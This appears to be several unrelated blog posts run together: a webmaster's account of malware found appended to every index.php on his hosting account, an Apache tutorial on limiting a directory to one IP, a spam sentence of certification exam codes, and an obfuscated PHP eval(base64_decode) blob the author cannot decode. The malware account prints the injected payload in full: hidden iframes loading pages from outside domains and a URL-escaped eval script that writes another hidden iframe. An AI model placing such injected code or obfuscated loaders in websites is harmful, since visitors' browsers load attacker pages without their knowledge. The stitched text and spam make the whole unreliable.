I’ve removed the malicious code and i suggest you check your websites too.

<code><iframe src=”http://fredkidns.com/check/upd.php?t=562″ border=”0″ height=”0″ width=”0″></iframe></code>
<code><iframe src=”http://bestinlive.cn/i/index.php” border=”0″ height=”0″ width=”0″>
</iframe><script>eval(unescape(“%77%69%6e%64%6f%77%2e%73%
74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75
%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%
61%6d%65%20%6e%61%6d%65%3d%62%30%20%73%72%63%3d%
5c%27%68%74%74%70%3a%2f%2f%66%72%65%64%6b%69%64%
6e%73%2e%63%6f%6d%2f%63%68%65%63%6b%2f%75%70%64%2
e%70%68%70%3f%74%3d%35%36%32%3f%27%2b%4d%61%74%68
%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%
6f%6d%28%29%2a%31%34%30%39%34%29%2b%27%39%33%64%
63%63%35%66%33%5c%27%20%77%69%64%74%68%d%32%36%3
1%20%68%65%69%67%68%74%3d%35%34%20%73%74%79%6c%6
5%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65
%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29″)); </script></code>

note: the line is so long that i had to insert line breaks
and it was added at the end of each index.php file from my hosting account. I checked the domain names and fredkidns.com its suspended but the other one operates as an online pharmacy, i sent them an email telling about the problem , but i got no reply so far. I havent been able to decode the script to see what it was actually doing, but im sure it was bad. And i forget to tell you the infection was only discovered by Mcafee antiv, bellow is the picture of the error message.

I hope this deoesent happen again because i will be forced to change hosting , maybe i will chose hostgator i heard they are very ok.

Forbidden

You don’t have permission to access /restricted on this server.

The explanations work on Debian with Apache2 tested by me, but also it should work on any other OS and Apache2 version. Here is how you do it: you need to edit the following file /etc/apache2/sites-available/default and you do that with the following commmand:

nano /etc/apache2/sites-available/default

now at the end of the file on top of </VirtualHost> you need to add the following:

<Directory “/var/www/restricted/”>
Options Indexes MultiViews FollowSymLinks
AllowOverride None
Order deny,allow
Deny from all
Allow from 1.1.1.1
</Directory>

replace “1.1.1.1″ with your ip and  “/var/www/restricted/” with the path to the directory you want to restrict access to.

Now press ctrl+x and then Y to confirm and save the modifications. Now we need to reload the config file with the following command and we are done.

/etc/init.d/apache2 reload

Most of the Microsoft 70-624 deploying and maintaining windows vista client and 2007 office system desktops and Microsoft 70-238 deploying messaging solutions with exchange server 2007 professionals deem Cisco 642-971 data center network infrastructure design and Microsoft 70-453 for transition MCITP SQL server 2005 DBA mandatory for every IBM 000-960 storage sales.

Here is the code:

$_F=__FILE__;$_X='Pz48ZDR2IDRkPSJmMjJ0NXIiPg0KPGM1bnQ1cj48Zj
JudCBzNHo1PSAiNiI+RDRzdHI0YjN0NWQgYnkgMW4gPDEgaHI1Zj0iaHR0cD
ovL3d3dy5raDFsNGRzbDRmNS5jMm0iIHQxcmc1dD1uNXc+SW50NXJuNXQ
gRW50cjVwcjVuNTNyPC8xPiB8ICBTcDJuczJyNWQgYnkgMSA8MSBocjVmP
SJodHRwOi8vd3d3LjJmZmI1MXQ0bmsuYzJtIiB0MXJnNXQ9bjV3PlQxdHQyM
jwvMT4gczR0NTwvYzVudDVyPg0KCTwvZDR2Pg0KDQo8L2Q0dj4NCg0KDQ
o8P3BocCAvKiAiSjNzdCB3aDF0IGQyIHkyMyB0aDRuayB5MjMncjUgZDI0bm
cgRDF2NT8iICovID8+DQoNCgkJPD9waHAgd3BfZjIydDVyKCk7ID8+DQo8L2
IyZHk+DQo8L2h0bWw+DQo=';eval(base64_decode('JF9YPWJhc2U2NF9k
ZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdW
llMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0
YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));


For the moment i’m stuck with the code.. and trying to find a solution.. I will give an update if i succeed in decoding it.